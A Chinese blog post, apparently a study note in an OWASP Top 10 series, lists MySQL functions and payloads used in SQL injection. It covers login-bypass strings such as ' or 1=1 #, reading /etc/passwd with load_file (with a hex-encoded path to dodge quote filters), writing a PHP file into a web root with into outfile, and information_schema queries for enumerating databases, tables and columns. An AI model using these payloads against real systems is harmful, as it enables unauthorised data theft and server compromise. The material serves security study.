mysql注入常用函数(1)

最新推荐文章于 2024-01-23 13:34:59 发布
最新推荐文章于 2024-01-23 13:34:59 发布
阅读量1k 收藏 3
点赞数
分类专栏: owasp top10 文章标签: mysql 数据库 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52556798/article/details/123461626
版权

mysql常用注释有哪些?
#
–[空格]或者是–+
//
过程中,这些注释可能都需要进行urlencode。

mysql认证绕过
;%00
‘ or 1=1 #
‘ /*!or */ 1=1 --+

mysql连接使用+来进行连接。
select * from users where username=‘zhangsan’ and “ab”=“a”+“b”;

常用的信息函数有:
database() ,用于获取当前所使用的数据库信息
version():返回数据库的版本,等价于@@version
user():返回当前的用户,等价如current_user参数。如:
select user(); #root@localhost
select current_user; #root@localhost
@@datadir,获取数据库的存储位置。
select @@datadir; #D:\xampp\mysql\data\

常见的功能函数有:

load_file():从计算机中载入文件,读取文件中的数据。
select * from users union select 1,load_file(’/etc/passwd’),3;
select * from users union select 1,load_file(0x2F6574632F706173737764),3; #使用16进制绕过单引号限制

into outfile:写入文件,前提是具有写入权限
select ‘<?php phpinfo(); ?>’ into outfile ‘/var/www/html/xxx.php’;
select char(60,63,112,104,112,32,112,104,112,105,110,102,111,40,41,59,32,63,62) into outfile ‘/var/www/html/xxx.php’;

concat():返回结果为连接参数产生的字符串。如果其中一个参数为null,则返回值为null。
用法如下:
select concat(username,password)from users;

*concat_ws() :是concat_ws()的特殊形式,第一个参数是分隔符,剩下的参数就是字段名。
select concat_ws(’,’,username,password) from users;

group_concat() :用于合并多条记录中的结果。
用法如下:
select group_concat(username) from users;
#返回的就是users表中所有的用户名,并且是作为一条记录返回。

subtring() ,substr():用于截断字符串。用法为:substr(str,pos,length) ,注意pos是从1开始的。
select substr((select database()),1,1);

ascii():用法返回字符所对应的ascii值。
select ascii(‘a’); #97
length():返回字符串的长度。
如:
select length(“123456”) #返回6

is(exp1,exp2,exp2):如果exp1的表达式是True,则返回exp2;否则返回exp3。
如:
select 1,2,if(1=1,3,-1) #1,2,3
selecrt 1,2,if(1=2,3,-1) #1,2,-1

以上就是在进行sql注入工程中常用的函数。
当然还存在一些使用的不是很多的函数。

**now():返回当前的系统时间
hex():返回字符串的16进制
unhex():反向的hex()的16进制
@@basedir():反向mysql的安装目录
@@versin_compile_os:操作系统**

mysql数据库元信息
在mysql中存在information_schema是一个信息数据库,在这个数据库中保存了Mysql服务器所保存的所有的其他数据库的信息,如数据库名,数据库的表,表的字段名称
和访问权限。在informa_schema中常用的表有:
schemata:存储了mysql中所有的数据库信息,返回的内容与show databases的结果是一样的。
tables:存储了数据库中的表的信息。详细地描述了某个表属于哪个schema,表类型,表引擎。
show tables from secuiry的结果就是来自这个表
**columns:**详细地描述了某张表的所有的列以及每个列的信息。
show columns from users的结果就是来自这个表
下面就是利用以上的3个表来获取数据库的信息。

select database(); #查选数据库
select schema_name from information_schema.schemata limit 0,1 #查询数据库
select table_name from information_schema.tables where table_schema=database() limit 0,1; #查询表
select column_name from information_schema.columns where table_name=‘users’ limit 0,1; #查询列

我是李现大王
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MySQL数据库基本操作
satasun的博客
09-27 240
菜鸟教程传送门 这里只做一些简单的摘记,如果想系统的学习或者针对某个模块进行学习还行参考菜鸟教程的链接。 对数据库的操作主要讲究增、删、改、查,这里也以这个为大纲进行讲解。 MySQL基本结构 数据库 首先要讲的是数据库,一个服务器往往有好几个数据库,像information_schema,mysql,performace_schema,phpmyadmin,sys是内置的库,然后像employ,wordfriend这两个数据库是我自己创建的。一个库里面可以放很多个表,是MySQL最大的一个存储单位。
SQL注入进阶篇-sql-labs合集
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
07-24 2808
工具 HackBar BurpSuite v2.1 基础挑战 Less-1 下面我将以第一关为例,使用四种注入手法 联合查询 http://114.55.107.51/sqli-labs/Less-1/?id=-1' union select 1,2,3--+ 查表 …select table_name from information_schema.tables where table_schema=database() limit 3,1… 查表中字段 …sel..
sql注入知识---基础函数及用法(mysql
尘玥的故事
01-23 500
最后要注意order by的原则,写在最前面的字段,他的优先级最高,也就是写法中第一个的字段名1的优先级最高,优先执行他的内容。以id分组,把price字段的值在同一行打印出来,逗号分隔(默认)1.asc 升序,可以省略,是数据库默认的排序方式。order by 3 以第3个字段去排序。是一个正整数,指定将从左边返回的字符数。可以通过limit函数来找到要查的数据。order by 判断有多少个字段。2.desc 降序,跟升序相反。字符串中最左边的长度字符。是要提取子字符串的字符串。函数返回一个空字符串。
MySQL注入秘籍【上篇】
大河之犬的博客
03-21 938
通常使用联合查询注入法,其作用就是,在原来查询条件的基础上,通过关键字union、union all拼接恶意SQL语句,union后面的select得到的结果将拼接到前个select的结果的后面。既然已经知道了查询列数了,那我们就需要判断哪些列的内容是可以显示到前端的,因为能显示到前端的字段,我们在利用时也能直接显示我们想要的数据。报错原理:e的x次方到x每增加1,其结果都将跨度极大,而mysql能记录的double数值范围有限,一旦结果超过范围,则该函数报错。直接查询数据库,不需要判断字段数、显位等;
mysql 注入 file load_Mysql注入中into outfile和load_file()总结
weixin_36219842的博客
01-28 405
(1)outfile后面不能接0x开头或者char转换以后的路径,只能是单引号路径。这个问题在php注入中更加麻烦,因为会自动将单引号转义成\',那么基本没的玩了。唯一的一种可能就是你使用mysql远程连接,然后直接在mysql中执行命令,就没有查询限制了。当然,你要是找到了phpmyadmin,也可以。(2)load_file,后面的路径可以是单引号、0x、char转换的字符。这而记得路径中的斜...
MySQL注入常用函数及逻辑运算
01-20
MySQL注入常用函数函数名称 函数功能 system_user() 系统用户名 user() 用户名 current_user() 当前用户名 session_user() 连接数据库的用户名 database() 数据库名 version() 数据库版本 @@...
Mysql注入中的outfile、dumpfile、load_file函数详解
01-19
在利用sql注入漏洞后期,最常用的就是通过mysql的file系列函数来进行读取敏感文件或者写入webshell,其中比较常用函数有以下三个 into dumpfile() into outfile() load_file() 我们...
mysql常用函数列表 (2).pdf
11-20
以下是 MySQL 常用函数的详细说明: 1. `mysql_affected_rows`:这个函数返回上一次操作(如INSERT、UPDATE、DELETE)影响的记录行数,可以帮助判断操作是否成功。 2. `mysql_change_user`:允许在已建立的连接上...
MySQL常用sql语句生成器
最新发布
03-22
- 安全性:一些生成器会检查SQL注入等安全问题,确保生成的语句是安全的。 8. 结论 MySQL SQL语句生成器是数据库管理和开发的有效工具,它使用户能够更轻松地与MySQL数据库交互。了解并熟练掌握SQL语句是每个数据库...
mysql练习注入语句
01-21
这里,我们介绍一些常用MySQL数据库函数: * `Count()`:返回 SELECT 语句中所选取的行数。 * `Length(str)`:返回字符串的长度。 * `Substr(str,pos,len)`:返回字符串的子串,从pos位置开始,长度为len。 * `...
mysql中select column_name from Information_schema.columns where table_Name = 'test'出现多个字段的问题
热门推荐
这是一颗有毒的柚子
04-06 1万+
mysql中,通过sql查询某个表字段时,会出现一些这个表中没有的字段 例: select column_name from Information_schema.columns  where table_Name = 'test'; 因为这个表在其它库中也存在了,所以会出现多余的字段。 解决办法: select column_name from Information_s
mysql 查询数据库有多少个表
takujo的博客
02-22 1374
查询某个数据库有多少表  select table_name from information_schema.tables where table_schema='库名'; 查询某个数据库下某张表有哪些字段及字段类型  select column_name,column_type from information_schema.columns where table_schema='库...
mysql查询数据库中的表名_mysql 查询数据库中的表名
weixin_42138545的博客
02-10 9374
查询一个数据库中含有某关键词的表名搜索一个数据库中包含一些关键字,词的表。SELECTTABLE_NAMEFROMinformation_schema. TABLESWHEREtable_schema = '数据库名'AND TABLE_NAME LIKE '%name%';例mysql> select table_name from information_schema.tables-&g...
mysql注入中的常用函数
qq_40861607的博客
03-06 222
database() 数据库名 version() YSQL数据库版本 load_file() 转成16进制或者是10进制 MYSQL读取本地文件的函数 @@datadir 读取数据库路径 @@basedir MYSQL 安装路径 @@version_compile_os 操作系统 system_user() 系统用户名 user() 用户名 current_user 当前用户名 session_...
SQL注入--Load_file与into outfile
weixin_44940180的博客
08-09 2887
Load_file与into outfile 利用into outfile拿到getshall
Mysql写入webshell两种方法总结-- into outfile,导入日志
qq_45730325的博客
05-19 3619
Mysql写入webshell
MySQL注入笔记(二)—MySQL注入常用函数
慢就是快
04-01 263
测试环境为MACOS,数据库版本为8.0.20
mysql注入中的outfile、dumpfile、load_file函数详解
whatday的专栏
10-29 3253
在利用sql注入漏洞后期,最常用的就是通过mysql的file系列函数来进行读取敏感文件或者写入webshell,其中比较常用函数有以下三个 into dumpfile() into outfile() load_file() 我们本次的测试数据如下 读写文件函数调用的限制 因为涉及到在服务器上写入文件,所以上述函数能否成功执行受到参数secure_file_priv的影...
史上最完整最全的MySQL注入教程.docx
11-25
"史上最完整最全的MySQL注入教程" 在网络安全领域,MySQL注入是一种常见的攻击手法,利用不安全的Web应用程序中的编程错误来操纵数据库。这篇教程深入浅出地介绍了MySQL注入的基本概念、方法以及防范措施,非常适合...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值